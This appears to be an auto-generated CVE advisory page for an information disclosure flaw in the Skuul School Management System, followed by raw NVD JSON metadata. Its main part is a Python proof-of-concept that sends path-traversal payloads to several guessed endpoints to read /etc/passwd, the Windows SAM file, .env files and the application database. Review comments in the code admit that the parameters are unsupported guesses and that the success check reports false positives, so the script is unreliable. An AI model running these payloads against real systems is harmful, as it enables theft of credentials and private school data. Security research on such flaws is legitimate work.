Security Vulnerability Report
CVE-2025-13785 CVSS 4.3 MEDIUM

CVE-2025-13785

Published: 2025-11-30 08:15:45
Last Modified: 2026-04-29 01:00:02

Description

A security vulnerability has been detected in yungifez Skuul School Management System up to 2.6.5. This issue affects some unknown processing of the file /user/profile of the component Image Handler. Such manipulation leads to information disclosure. The attack may be performed remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector (CNA-supplied secondary assessment; the NVD primary CVSS 3.1 assessment in the raw JSON below rates confidentiality impact HIGH, base score 6.5)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:yungifez:skuul:*:*:*:*:*:*:*:* - VULNERABLE
Skuul School Management System <= 2.6.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-13785 PoC - Information Disclosure in Skuul School Management System
# Target: /user/profile Image Handler component
#
# NOTE(review): the advisory on this page names only /user/profile and gives no
# parameter names; the extra paths and the 'image'/'file' query parameters below are
# not supported by the advisory text and appear to be guesses — confirm against the
# referenced gist before treating any result from this script as authoritative.


def exploit_cve_2025_13785(target_url: str) -> bool:
    """
    Probe a Skuul instance for the CVE-2025-13785 information disclosure.

    Sends a GET request to each path in ``endpoints`` with every string in
    ``payloads`` passed as both the ``image`` and ``file`` query parameter, and
    reports the first HTTP 200 whose body contains ``'root:'`` or ``'['``.

    Args:
        target_url: Base URL of the instance; a trailing slash is stripped.

    Returns:
        True as soon as one response matches the heuristic, False after every
        endpoint/payload pair has been tried without a match.

    Side effects:
        Prints progress and results to stdout. Network errors for a single
        request are printed and skipped, not raised.

    Detection note: these probes show up in web-server access logs as GET
    requests to the paths below whose query string contains ``../`` or ``..\\``
    sequences in the ``image``/``file`` parameters.
    """
    # Target endpoint for profile image handler
    endpoints = [
        "/user/profile",
        "/user/profile/avatar",
        "/api/user/profile/image",
        "/storage/profile-images"
    ]
    # Malicious payloads to test for path traversal and information disclosure
    payloads = [
        "../../../../etc/passwd",
        "../../../../../../etc/passwd",
        "..\\..\\..\\..\\windows\\system32\\config\\sam",
        "../../../../var/www/html/.env",
        "../../../../storage/database.sqlite"
    ]
    print(f"[*] Testing target: {target_url}")
    print(f"[*] CVE-2025-13785 - Skuul School Management System Information Disclosure")
    for endpoint in endpoints:
        for payload in payloads:
            try:
                # Test for path traversal in image handler
                url = target_url.rstrip('/') + endpoint
                # NOTE(review): no session cookie or token is sent, while the
                # advisory's vector is PR:L (privileges required). A negative
                # result from this script is therefore not evidence that a
                # target is unaffected.
                params = {'image': payload, 'file': payload}
                response = requests.get(url, params=params, timeout=10)
                if response.status_code == 200:
                    # Check if sensitive data was leaked
                    # NOTE(review): the '[' branch matches almost any HTML page
                    # (inline JavaScript arrays, markup), so a routine 200 from
                    # the bare profile page is reported as VULNERABLE. Treat a
                    # positive from this heuristic as a false-positive-prone
                    # signal that needs manual confirmation, not as proof.
                    if 'root:' in response.text or '[' in response.text:
                        print(f"[!] VULNERABLE! Endpoint: {endpoint}")
                        print(f"[!] Payload: {payload}")
                        print(f"[!] Response length: {len(response.text)}")
                        return True
            except requests.RequestException as e:
                # Best-effort: a failed request for one pair does not stop the scan.
                print(f"[-] Error testing {endpoint}: {str(e)}")
    print("[*] Testing complete. No obvious vulnerability detected.")
    return False


if __name__ == "__main__":
    # Usage: a single positional argument, the base URL of the instance.
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-13785.py <target_url>")
        print("Example: python cve-2025-13785.py http://target.com")
        sys.exit(1)
    target = sys.argv[1]
    exploit_cve_2025_13785(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13785", "sourceIdentifier": "[email protected]", "published": "2025-11-30T08:15:45.403", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in yungifez Skuul School Management System up to 2.6.5. This issue affects some unknown processing of the file /user/profile of the component Image Handler. Such manipulation leads to information disclosure. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", 
"modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-284"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", 
"value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:yungifez:skuul:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.6.5", "matchCriteriaId": "9993017D-E25A-4959-91D8-4A37A6B6A03B"}]}]}], "references": [{"url": "https://gist.github.com/thezeekhan/02f5255506080849fc732eea07008634", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.333789", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.333789", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.689026", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://gist.github.com/thezeekhan/02f5255506080849fc732eea07008634", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?submit.689026", "source": "134c704f-9b21-4f ... (truncated)